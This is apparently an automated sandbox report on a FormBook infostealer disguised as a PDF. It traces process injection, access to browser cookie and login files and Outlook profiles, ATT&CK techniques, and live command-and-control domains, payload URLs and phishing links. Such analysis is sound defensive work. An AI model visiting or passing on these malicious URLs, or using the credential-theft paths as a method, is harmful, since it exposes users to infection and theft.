            Source: C:\Windows\SysWOW64\sdchange.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: cXGDMXIloFhOE.exe, 00000006.00000000.2521666892.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2937048524.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000008.00000002.2937737692.0000000000F11000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: cXGDMXIloFhOE.exe, 00000006.00000000.2521666892.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2937048524.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000008.00000002.2937737692.0000000000F11000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: cXGDMXIloFhOE.exe, 00000006.00000000.2521666892.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2937048524.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000008.00000002.2937737692.0000000000F11000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: cXGDMXIloFhOE.exe, 00000006.00000000.2521666892.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2937048524.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000008.00000002.2937737692.0000000000F11000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

            Stealing of Sensitive Information

            Source: Yara match, File source: 00000007.00000002.2937577500.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.2937146077.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.2935957213.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.2937634910.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2633149796.00000000329F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.2937326522.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2633741377.0000000033050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\sdchange.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

Source: Yara match; File source: 00000007.00000002.2937577500.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2937146077.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2935957213.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2937634910.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2633149796.00000000329F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.2937326522.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2633741377.0000000033050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (techniques flagged in this analysis, with the number of matching signatures in parentheses)

Reconnaissance: no techniques flagged
Resource Development: no techniques flagged
Initial Access: no techniques flagged
Execution: Native API (1)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Access Token Manipulation (1); Process Injection (312); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1)
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (1); Access Token Manipulation (1); Process Injection (312); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (2); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1)
Discovery: Security Software Discovery (221); Virtualization/Sandbox Evasion (1); Process Discovery (2); File and Directory Discovery (3); System Information Discovery (24)
Lateral Movement: no techniques flagged
Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1); Clipboard Data (1)
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4)
Exfiltration: no techniques flagged
Impact: System Shutdown/Reboot (1)
Behavior Graph (ID: 1562046; Sample: S#U0130PAR#U0130#U015e No.1...; Startdate: 25/11/2024; Architecture: WINDOWS; Score: 100)

Start
  Network: www.vayui.top; officinadelpasso.shop; 2 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 4 other signatures
  -> S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe (started)
       Dropped: C:\Users\user\AppData\Local\...\System.dll (PE32); C:\Users\user\AppData\Local\...\LangDLL.dll (PE32)
       -> S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe (started)
            Network: enechado.ru.com 103.83.194.50, 49743, 80 NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN United States
            Signatures: Maps a DLL or memory area into another process
            -> cXGDMXIloFhOE.exe (injected)
                 Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                 -> sdchange.exe (started)
                      Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                      -> cXGDMXIloFhOE.exe (injected)
                           Network: officinadelpasso.shop 195.110.124.133, 49839, 80 REGISTER-ASIT Italy; www.vayui.top 104.21.95.160, 49875, 80 CLOUDFLARENETUS United States
                           Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                      -> firefox.exe (started)

Antivirus Detection (Source | Detection | Scanner | Label)

Initial sample:
  S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | 15% | Virustotal
  S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | 5% | ReversingLabs

Dropped files:
  C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\LangDLL.dll | 0% | ReversingLabs
  C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll | 3% | ReversingLabs

No Antivirus matches

Domains:
  enechado.ru.com | 1% | Virustotal
  www.vayui.top | 2% | Virustotal

URLs:
  http://www.vayui.top | 0% | Avira URL Cloud | safe
  http://www.officinadelpasso.shop/vlg0/?s42t_Nbx=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&F0vD=qVTlJB1hk6Wd | 0% | Avira URL Cloud | safe
  http://enechado.ru.com/tk.bin | 0% | Avira URL Cloud | safe
  http://enechado.ru.com/tk.binJ | 0% | Avira URL Cloud | safe
  http://www.vayui.top/4twy/ | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
  enechado.ru.com | 103.83.194.50 | true | false | - | unknown
  www.vayui.top | 104.21.95.160 | true | true | - | unknown
  officinadelpasso.shop | 195.110.124.133 | true | true | - | unknown
  www.officinadelpasso.shop | unknown | unknown | false | - | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
  http://www.officinadelpasso.shop/vlg0/?s42t_Nbx=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&F0vD=qVTlJB1hk6Wd | true | Avira URL Cloud: safe | unknown
  http://enechado.ru.com/tk.bin | false | Avira URL Cloud: safe | unknown
  http://www.vayui.top/4twy/ | true | Avira URL Cloud: safe | unknown
URLs from memory and binary strings (Name | Source | Malicious | Antivirus Detection | Reputation)
  https://ac.ecosia.org/autocomplete?q= | sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | false | - | high
  https://duckduckgo.com/chrome_newtab | sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | false | - | high
  http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.00000000005F2000.00000008.00000001.01000000.00000009.sdmp | false | - | high
  https://duckduckgo.com/ac/?q= | sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | false | - | high
  https://www.google.com/images/branding/product/ico/googleg_lodp.ico | sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | false | - | high
  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | false | - | high
  http://enechado.ru.com/tk.binJ | S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2603801719.0000000002D48000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
  https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp | false | - | high
  http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.00000000005F2000.00000008.00000001.01000000.00000009.sdmp | false | - | high
  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | false | - | high
  http://www.ftp.ftp://ftp.gopher. | S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp | false | - | high
  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | false | - | high
  http://nsis.sf.net/NSIS_ErrorError | S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | false | - | high
  https://www.ecosia.org/newtab/ | sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | false | - | high
  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | false | - | high
  http://www.vayui.top | cXGDMXIloFhOE.exe, 00000008.00000002.2937146077.0000000000835000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
  195.110.124.133 | officinadelpasso.shop | Italy | 39729 | REGISTER-ASIT | true
  103.83.194.50 | enechado.ru.com | United States | 132335 | NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN | false
  104.21.95.160 | www.vayui.top | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1562046
Start date and time: 2024-11-25 07:07:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe (renamed because the original name is a hash value)
Original Sample Name: SPAR No.112024-pdf.bat.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/10@3/3
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 67%
• Number of executed functions: 51
• Number of non-executed functions: 290
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size getting too big: too many NtQueryValueKey calls found.
• Report size getting too big: too many NtSetInformationFile calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            No simulations
IP context (Match | Associated Sample Name / URL | Detection | Threat Name | Context)

195.110.124.133:
  Certificate 11-21AIS.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
  Certificate 1045-20-11.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
  Certificate 719A1120-2024.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
  Certificate 64411-18.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
  Certificate 11-142024.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
  rDocument11-142024.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
  RFQ 3100185 MAHAD.exe | malicious | FormBook | www.nutrigenfit.online/2vhi/
  RN# D7521-RN-00353 REV-2.exe | malicious | FormBook | www.nutrigenfit.online/2vhi/
  glued.hta | malicious | FormBook | www.elettrosistemista.zip/fo8o/
  proforma Invoice.exe | malicious | FormBook | www.nutrigenfit.online/xtuc/

103.83.194.50:
  ZAM#U00d3WIENIE nr 594uzzf485-pdf.exe | malicious | GuLoader | passion4dance.ru.com/POL.bin
  ZAM#U00d3WIENIE nr 594uzzf485-pdf.exe | malicious | GuLoader | passion4dance.ru.com/POL.bin
  CONTRACT-pdf.exe | malicious | AgentTesla | passion4dance.ru.com/qa.bin
  WTsvUl9X8N.exe | malicious | Oski Stealer, Vidar | 9entrevera.sa.com/o/
  SecuriteInfo.com.Win32.SuspectCrc.30843.5697.exe | malicious | GuLoader | insula.sa.com/sgp/xkxkBkUGnvBunHoZmLt35.bin
  doc_order_sheet_sn8577THC_13122023_pdf_0000000.vbs | malicious | GuLoader, Remcos | ytgz5.sa.com/gBuCeYv217.bin
  awb_dhl_shipping_documents_PL&BL_13122023_pdf000000000000000000000000000000000.vbs | malicious | GuLoader, Remcos | ytgz5.sa.com/KaIWGuoaPXGhlzSd30.bin
  PmX1jHdUnS.exe | malicious | Oski Stealer, Vidar | 9enternecera.ru.com/os/
  REF#117300-100823.xlam.xlsx | malicious | Unknown | sandiisells.com/.well-known/acme-challenge/cx/raf.vbs
  DC0376654883101.vbs | malicious | Unknown | fumigueg.tk/scss/pQYcmyNJ26.pfm
Domain context (Match | Associated Sample Name / URL | Detection | Threat Name | Context)

www.vayui.top:
  purchase Order.exe | malicious | FormBook | 172.67.145.234
  RFQ 3100185 MAHAD.exe | malicious | FormBook | 172.67.145.234
ASN context (Match | Associated Sample Name / URL | Detection | Threat Name | Context)

REGISTER-ASIT:
  Certificate 11-21AIS.exe | malicious | FormBook | 195.110.124.133
  Certificate 1045-20-11.exe | malicious | FormBook | 195.110.124.133
  Certificate 719A1120-2024.exe | malicious | FormBook | 195.110.124.133
  Certificate 11-18720.exe | malicious | FormBook | 195.110.124.133
  RvJVMsNLJI.exe | malicious | FormBook | 195.110.124.133
  Certificate 64411-18.exe | malicious | FormBook | 195.110.124.133
  Certificate 11-142024.exe | malicious | FormBook | 195.110.124.133
  rDocument11-142024.exe | malicious | FormBook | 195.110.124.133
  RFQ 3100185 MAHAD.exe | malicious | FormBook | 195.110.124.133
  Magnetnaalene.exe | malicious | FormBook, GuLoader | 195.110.124.133

NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN:
  https://recociese.za.com/wpcones/excel.html | malicious | Unknown | 103.83.194.50
  LPC Scanned Docs-Copyright #U00a9GNP.CPL.dll | malicious | AsyncRAT | 103.83.194.50
  08cb9f0ed370a2daea9dc05fa08aedc2a10b1615.html | malicious | Unknown | 103.83.194.55
  sora.m68k.elf | malicious | Mirai | 168.81.254.150
  Reminders for Msp-partner_ Server Alert.eml | malicious | HTMLPhisher | 103.83.194.55
  CARDFACTORYAccess Program, Tuesday, October 29, 2024.eml | malicious | HTMLPhisher | 103.83.194.55
  https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Ffairwaygilbert.com%2Fnew%2FdtMyxOyre1WJ8xvj5DnN7kDa/Y2hyaXMuaGF3a2luc0BwZXJyeWhvbWVzLmNvbQ== | malicious | Tycoon2FA | 103.83.194.5
  https://url.avanan.click/v2/r01/___https://drickly-com-dot-fluid-dreamer-410607.uc.r.appspot.com/?h=66LVKOwLflbMjYVoJBNTrXiW3CEpoRg_EafL_ygpoXil&fru;v=755/8c88*~*9&fru;w=6c5ghgij98cg/ffg&fru;E=6a766/89b55*~*9&fru;t=myyue8Fe7Ke7KBBB.lttlqj.htr.xle7Kzwqe8Kxfe8Iye7*~*jxwhe8I3ZR/bSIze7*~*xtzwhje8Ie7*~*whye8I859Oe7*~*e7*~*hie8I7/*~*Ize7*~*zfhye7*~*zwqe8Ifrue7Kxe7KfwrxywtslxyjjqBtwp.htrd.fnlzD___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzo3NDhmM2FkMWRiOWU2YTNlMjE1YzgwMzRjMTliODRkZDo3OmNmNmI6NjYyMTE5OWZiNzU5MjU0NTE1ZjgzODM0ZWRlYjRmZDIwOWJmNTQ3YWUwY2MxNmU5NjFiZmExYjYzM2U0YzA0MzpoOlQ6VA#YmJyYWNleUBwcmVzaWRpby5jb20= | malicious | Unknown | 103.83.194.55
  https://url.avanan.click/v2/r01/___https://www.google.com.sg/zwq?v=7WZIz&fru;why=7WZIz&fru;xf=y&fru;jxwh=7WZIz&fru;xtzwhj=&fru;hi=7WZIz&fru;zfhy=&fru;zwq=frudxdgtqiqntsfuufwjq.htrd.n___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpkZGUwNjUwMWZkNDExNDYwNzZjMDZiMzcyYTg5ZmU1NDo3OjE4NDg6ZGQ5NzQ2M2JkZmJmZTM2MDBmOTU2MjU4MWJhNWIyZDA0ODAzMGI4MzllZGM2ZjkzYmIwZjc2YWQ5ZmQ2MDFhNTpoOlQ6VA#ZWphbWVzQGVuY2luYWNhcGl0YWwuY29t | malicious | HTMLPhisher | 103.83.194.55
  https://link-karix.unifiedrml.com/link/load/?uid=66f149a6a2cee777918b45c2-66f14b565f7b47ad77e978c0-66f14b0aa2cee705a28b4575&uri=https%3A%2F%2Fbluworldusabluworldusa.jimdofree.com/ | malicious | HTMLPhisher | 103.83.194.5

CLOUDFLARENETUS:
  Shave.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.177.134
  file.exe | malicious | LummaC Stealer | 172.67.155.47
  https://sites.google.com/mdisrupt.com/rfp/home | malicious | HTMLPhisher | 172.67.195.202
  file.exe | malicious | Amadey, Stealc, Vidar | 172.64.41.3
  file.exe | malicious | Unknown | 104.21.88.250
  https://glorydaysaheadnnowx.us:443/verify/?verify' | malicious | Unknown | 172.67.196.133
  file.exe | malicious | LummaC Stealer | 172.67.162.84
  file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar | 172.67.162.84
  file.exe | malicious | LummaC Stealer | 172.67.162.84
  New shipment AWB NO - 09804480383.exe | malicious | PureLog Stealer, Snake Keylogger | 172.67.177.134
                                            No context
Dropped file context (Match | Associated Sample Name / URL | Detection | Threat Name)

C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\LangDLL.dll:
  Readouts.bat.exe | malicious | GuLoader
  Account& Payment Transfer Details_pdf.exe | malicious | Remcos, GuLoader
  Account& Payment Transfer Details_pdf.exe | malicious | GuLoader
  https://updatecdn.meeting.qq.com/cos/37a67c4f1858c83dff9f22a27bb8f27d/VooVMeeting_1410000197_3.23.1.510.publish.exe | malicious | Unknown
  3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe | malicious | GuLoader
  3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe | malicious | GuLoader
  rjustificantePago_es_180214093508pdf.exe | malicious | GuLoader
  rjustificantePago_es_180214093508pdf.exe | malicious | GuLoader
  CI890892.6409410669pdf.exe | malicious | FormBook, GuLoader
  CI890892.6409410669pdf.exe | malicious | GuLoader
Process: C:\Windows\SysWOW64\sdchange.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):5632
                                                                Entropy (8bit):3.81704362174321
                                                                Encrypted:false
                                                                SSDEEP:48:S46+/p2TKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mhofjLl:zf2uPbOBtWZBV8jAWiAJCdv2CmwL
                                                                MD5:3DD80DFF583544514EEB3A5ED851A519
                                                                SHA1:56F7324D9D4230C96D1963E7B3E02B05A6CF5C24
                                                                SHA-256:86CFF5EACA76C49F924CB123D242FDCFD45AB99C4B638D3B8F4A8CFB1970AB5B
                                                                SHA-512:955F4DF195B5D134449904E9020F80125CFB64D70D9482FF583451F3FCB10D15577CEAC4180F71A96452D8478F6365160AB15731F9A79A494383087C9310FD1D
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: Readouts.bat.exe, Detection: malicious
                                                                • Filename: Account& Payment Transfer Details_pdf.exe, Detection: malicious
                                                                • Filename: Account& Payment Transfer Details_pdf.exe, Detection: malicious
                                                                • Filename: , Detection: malicious
                                                                • Filename: 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe, Detection: malicious
                                                                • Filename: 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe, Detection: malicious
                                                                • Filename: rjustificantePago_es_180214093508pdf.exe, Detection: malicious
                                                                • Filename: rjustificantePago_es_180214093508pdf.exe, Detection: malicious
                                                                • Filename: CI890892.6409410669pdf.exe, Detection: malicious
                                                                • Filename: CI890892.6409410669pdf.exe, Detection: malicious
                                                                Reputation:moderate, very likely benign file
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L.....oZ...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):11776
                                                                Entropy (8bit):5.890541747176257
                                                                Encrypted:false
                                                                SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                                                MD5:75ED96254FBF894E42058062B4B4F0D1
                                                                SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                                                SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                                                SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                Reputation:moderate, very likely benign file
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):108400
                                                                Entropy (8bit):2.658480463898876
                                                                Encrypted:false
                                                                SSDEEP:1536:m2ntSllw3iTAjI+1YmIZd+8ecSD/H4QCFDgd/BsYXFRJ3xqq:P2C4spT
                                                                MD5:D9C1EAE360D5092BABF95AE6C59C6B40
                                                                SHA1:A8AEC2253394C81135BA3AC5E5329F0044D94158
                                                                SHA-256:E597A7750A85662AD1A04307A847474D947BA1367EC822438FFFB6DAAF6FE14A
                                                                SHA-512:72AF870662835FF1C5B4F1D42FA0BF0DF38D83BA277F58003FDCC24EB792D4D18BCF89C3268B317DCF0AFC6CECC519F83BD9AF95B5544D723BAEB555647CE6C1
                                                                Malicious:false
                                                                Preview:
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 2000x2000, components 3
                                                                Category:dropped
                                                                Size (bytes):165466
                                                                Entropy (8bit):6.5947581943238625
                                                                Encrypted:false
                                                                SSDEEP:3072:b9bANrxjToG8aMvWDtSYT8TBs9M/U2UKEVKQUsLNcY/:Sxj5AeyBN/U2L6KQfNZ
                                                                MD5:152B2AA9B4B656DF132C2E5EAD37A7D5
                                                                SHA1:9C0FDBAAB3A483D4857BB8A2269CD21177BBD1D9
                                                                SHA-256:11970E0E0D67A2FD31BD5907E279F43F52A3B2547391FF843B52BF79062CA00F
                                                                SHA-512:4D756CC91321FD2646D5383E3EC3F736BA2B59DD46C912D9D28CD67858A4FA9A6E2FD8312F91D1EEA4392B01830DDD1F59B40353265D0B9CA84F7DA2D62F2E10
                                                                Malicious:false
